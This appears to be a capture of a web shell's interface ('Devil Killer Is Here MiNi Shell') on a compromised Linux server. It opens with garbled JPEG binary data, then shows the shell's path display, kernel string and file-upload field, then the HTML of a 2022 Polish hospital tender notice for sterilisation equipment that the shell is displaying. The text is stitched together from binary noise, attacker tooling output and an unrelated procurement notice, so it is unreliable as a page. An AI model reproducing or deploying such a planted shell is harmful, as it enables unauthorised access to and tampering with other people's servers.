JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220107/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220107/0000799801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZP/TP/20221/3-sprzęt </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SPECJALISTYCZNE CENTRUM MEDYCZNE IM. ŚW. JANA PAWŁA II SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020493961</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Polanica-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@scm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.scm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZP/TP/20221/3-sprzęt </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2aa9ef0-6fba-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00007998</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.scm.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bip.scm.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">12.1	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa przy użyciu środków komunikacji elektronicznej, za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej na adres zp@scm.pl.<br/>Pytania do Zamawiającego można zadawać na adres zp@scm.pl z wyraźnym podaniem w tytule symbolu postępowania ZP/TP/2022/3-sprzęt<br/>12.2. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Dominika Tust-Kopeć, email: zp@scm.pl<br/>12.3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>12.4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>12.5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>12.6	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>12.7.	Identyfikator postępowania o udzielenie zamówienia dostępne są na liście wszystkich postępowań na miniPortalu.<br/>12.8.	Odpowiedzi na zadane pytania, informacje dodatkowe itp. umieszczane będą na stronie internetowej – https://bip.scm.pl – zakładka zamówienia publiczne i przekazywane Wykonawcom zgodnie z art. 284 ust. 6 ustawy.<br/>12.9.	Specyfikację Warunków Zamówienia można pobrać bezpłatnie ze strony internetowej Zamawiającego https://bip.scm.pl zakładka zamówienia publiczne.<br/>12.10.	Wynik postępowania zostanie przekazany za pomocą poczty elektronicznej, na wskazany w ofercie adres e-mail.<br/>12.11	Informację podane podczas otwarcia ofert złożonych do postępowania, stosownie do art. 222 ust. 5 UPzp, Zamawiający niezwłocznie zamieści na stronie internetowej https://bip.scm.pl.<br/>12.12	Zamawiający nie udziela żadnych ustnych i telefonicznych informacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (zwanego dalej - ogólne rozporządzenie o ochronie danych lub RODO) informujemy, że:<br/>Administratorem Państwa danych osobowych jest Specjalistyczne Centrum Medyczne im. św. Jana Pawła II spółka akcyjna z siedzibą w Polanicy-Zdroju (dalej: Spółka).<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w <br/>celu przeprowadzenia postępowania o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego oznaczonego ZP/TP/2022/3-sprzęt<br/>W związku z przetwarzaniem Państwa danych osobowych przysługują Państwu: prawo dostępu do swoich danych osobowych oraz ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo do wniesienia sprzeciwu wobec przetwarzania - o ile zachodzą okoliczności i przypadki określone prawem.<br/>Mają Państwo prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.<br/>Zakres danych, które przetwarzamy jest niezbędny do osiągnięcia wskazanego wyżej celu. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych. Niepodanie określonych danych skutkuje brakiem możliwości rozpatrzenia przez nas Państwa oferty.<br/>Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Na podstawie Państwa danych osobowych Administrator nie będzie podejmował wobec Państwa zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.<br/>Państwa dane mogą być przekazane podmiotom uprawnionym do uzyskania danych na podstawie obowiązującego prawa.<br/>Mogą Państwo realizować swoje prawa kierując korespondencję na adres: Specjalistyczne Centrum Medyczne im. św. Jana Pawła II spółka akcyjna 57-320 Polanica-Zdrój, ul. Jana Pawła II 2, Mogą Państwo również napisać do Inspektora Ochrony Danych w Spółce na adres e-mail: daneosobowe@scm.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup, dostawa wraz z rozładunkiem i montażem sprzętu medycznego dla potrzeb dla potrzeb Centralnej Sterylizatorni Specjalistycznego Centrum Medycznego im. św. Jana Pawła II S.A. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. W celu wykazania spełniania przez Wykonawcę warunków o których mowa w art. 112<br/>ustawy Pzp Wykonawca zobowiązany jest do złożenia następujących dokumentów i<br/>oświadczeń:<br/>7.1.1. Zdolność do występowania w obrocie gospodarczym - na potwierdzenie Zamawiający<br/>żąda od Wykonawcy prowadzącego działalność gospodarczą lub zawodową dokumentu<br/>potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych<br/>prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie<br/>wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/>7.1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów - na potwierdzenie Zamawiający żąda złożenia zezwolenia,<br/>licencji, koncesji, lub wpisu do rejestru działalności regulowanej, a w przypadku braku<br/>konieczności ich posiadania, Wykonawca składa oświadczenie informując o braku konieczności<br/>posiadania w/w dokumentów.<br/>7.1.3. Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej<br/>wykonanie zamówienia, na potwierdzenie Zamawiający żąda złożenia oświadczenia z art. 273<br/>ustawy Pzp – wg wzoru- ZAŁĄCZNIK NR 3 do SWZ,<br/>7.1.4. Wykonawca musi posiadać zdolność techniczną i zawodową. Na potwierdzenie<br/>Zamawiający żąda złożenia „Wykazu wykonanych dostaw”- zgodnie z ZAŁĄCZNIKIEM NR 5 do<br/>SWZ oraz załączenie 2 dokumentów potwierdzających, że dostawy te zostały wykonane lub są<br/>wykonywane należycie.<br/>Za spełnienie tego wymogu Zamawiający uzna wykonanie, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanie dostaw przez Wykonawcę w okresie ostatnich 3<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których dostawy lub usługi zostały wykonane lub są wykonywane .<br/>Dowodami tymi są w szczególności:<br/>7.1.4.1. referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy<br/>lub usługi zostały wykonane, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług<br/>okresowych lub ciągłych, poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące<br/>przed upływem terminu składania ofert;<br/>7.1.4.2. w przypadku zamówień na dostawy lub usługi – oświadczenie Wykonawcy – jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów , o<br/>których mowa w punkcie powyżej.<br/>W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa odpowiednio powyżej<br/>budzą wątpliwości Zamawiającego lub gdy z referencji albo z innego dokumentu wynika, że<br/>zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może<br/>zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego, dostawy lub usługi były lub<br/>miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio<br/>Zamawiającemu.<br/>7.1.5. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych<br/>podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>7.1.6. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi<br/>udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>Zobowiązanie podmiotu udostępniającego zasoby Wykonawcy ma gwarantować rzeczywisty<br/>dostęp do tych zasobów oraz określać w szczególności:<br/>7.1.6.1 zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>7.1.6.2 sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>7.1.6.3 czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane<br/>zdolności dotyczą.<br/>7.1.7. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności<br/>techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie<br/>przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust.<br/>2 pkt 3 i 4 oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, zgodnie z<br/>art. 108. ust.1. oraz art. 109 ust.1 pkt 4. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.2. W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia, o których<br/>mowa w art. 273 ust 1 pkt 1 ustawy Pzp Wykonawca zobowiązany jest złożyć następujące dokumenty:<br/>7.2.1. Oświadczenie o braku podstaw do wykluczenia zgodne z art. 108 ust.1 ustawy Pzp wg wzoru -<br/>ZAŁĄCZNIK NR 4 do SWZ,<br/>7.2.2 Aktualny odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy Pzp, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W zakresie nieuregulowanym SWZ, zastosowanie mają przepisy rozporządzenia Ministra Rozwoju,<br/>Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy w postępowaniu<br/>o udzielenie zamówienia (Dz. U. z 2020 r., poz. 2415).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.1.1. Zdolność do występowania w obrocie gospodarczym - na<br/>potwierdzenie Zamawiający żąda od Wykonawcy prowadzącego działalność gospodarczą lub<br/>zawodową dokumentu potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub<br/>handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie<br/>wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/>7.1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów - na potwierdzenie Zamawiający żąda złożenia zezwolenia, licencji, koncesji,<br/>lub wpisu do rejestru działalności regulowanej, a w przypadku braku konieczności ich posiadania,<br/>Wykonawca składa oświadczenie informując o braku konieczności posiadania w/w dokumentów.<br/>7.1.3. Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie<br/>zamówienia, na potwierdzenie Zamawiający żąda złożenia oświadczenia z art. 273 ustawy Pzp – wg<br/>wzoru- ZAŁĄCZNIK NR 3 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dla potwierdzenia wymagań Wykonawca wraz z ofertą przedkłada dla asortymentu<br/>wymienionego w załączniku nr 2 SWZ:<br/>10.1. Oryginalne materiały producenta (katalogi, wyciągi z katalogów lub broszury informacyjne)<br/>wymaganych parametrów oferowanego sprzętu i na tej podstawie dokonania oceny zgodności<br/>oferowanych wyrobów z opisem przedmiotu zamówienia i jednoznacznego stwierdzenia<br/>spełniania wszystkich wymogów stawianych w SIWZ. W przypadku wątpliwości, Zamawiający<br/>zastrzega sobie prawo do potwierdzenia spełnienia parametrów przez oferowane wyroby<br/>poprzez skorzystanie z informacji producenta zamieszczanych na powszechnie dostępnych<br/>stronach internetowych<br/>10.2 Dokumenty potwierdzające dopuszczenie do obrotu i używania na terytorium RP<br/>oferowanego sprzętu zgodnie z Ustawą z dnia 20 maja 2010r. o wyrobach medycznych (t. j. Dz.<br/>U. 2017.poz 211)<br/>a) deklaracji zgodności,<br/>b) certyfikatu wystawionego przez jednostkę notyfikowaną,<br/>c) kopii powiadomienia lub zgłoszenia do Rejestrów wyrobów medycznych i podmiotów<br/>odpowiedzialnych za ich wprowadzenie do obrotu i używania.<br/>Dokumenty wymienione w lit. b) i c) należy załączyć, jeżeli jest to wymagane przepisami Ustawy<br/>z dnia 20 maja 2010r. o wyrobach medycznych (t.j. Dz.U. z 2017 poz. 211). Dokumenty o<br/>których mowa powyżej są składane w formie oryginału lub kopii poświadczonej za zgodność z<br/>oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z<br/>tłumaczeniem na język polski.<br/>10.3 Instrukcję obsługi w języku polskim. Zamawiający dopuszcza dołączenie do oferty instrukcji<br/>obsługi na nośniku danych.<br/>10.4 Wszystkie dokumenty muszą być ważne przez okres na jaki zostanie zawarta umowa. W<br/>przypadku kończącego się terminu ważności dokumentu Wykonawca ma obowiązek dostarczyć<br/>wymagany aktualny dokument w terminie do ostatniego dnia miesiąca poprzedzającego miesiąc<br/>upływu terminu ważności dokumentu przedstawionego w ofercie przez Wykonawcę. W<br/>przypadku gdy dokument traci ważność podczas trwania umowy Wykonawca musi załączyć do<br/>aktualnego dokumentu oświadczenie, że dostarczy przedłużenie dokumentu do siedziby<br/>Zamawiającego.<br/>Powyższe dokumenty należy składać w formie elektronicznej w postaci plików identyfikujących<br/>numer pakietu i pozycję przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dla potwierdzenia wymagań Wykonawca wraz z ofertą przedkłada dla asortymentu<br/>wymienionego w załączniku nr 2 SWZ:<br/>10.1. Oryginalne materiały producenta (katalogi, wyciągi z katalogów lub broszury informacyjne)<br/>wymaganych parametrów oferowanego sprzętu i na tej podstawie dokonania oceny zgodności<br/>oferowanych wyrobów z opisem przedmiotu zamówienia i jednoznacznego stwierdzenia<br/>spełniania wszystkich wymogów stawianych w SIWZ. W przypadku wątpliwości, Zamawiający<br/>zastrzega sobie prawo do potwierdzenia spełnienia parametrów przez oferowane wyroby<br/>poprzez skorzystanie z informacji producenta zamieszczanych na powszechnie dostępnych<br/>stronach 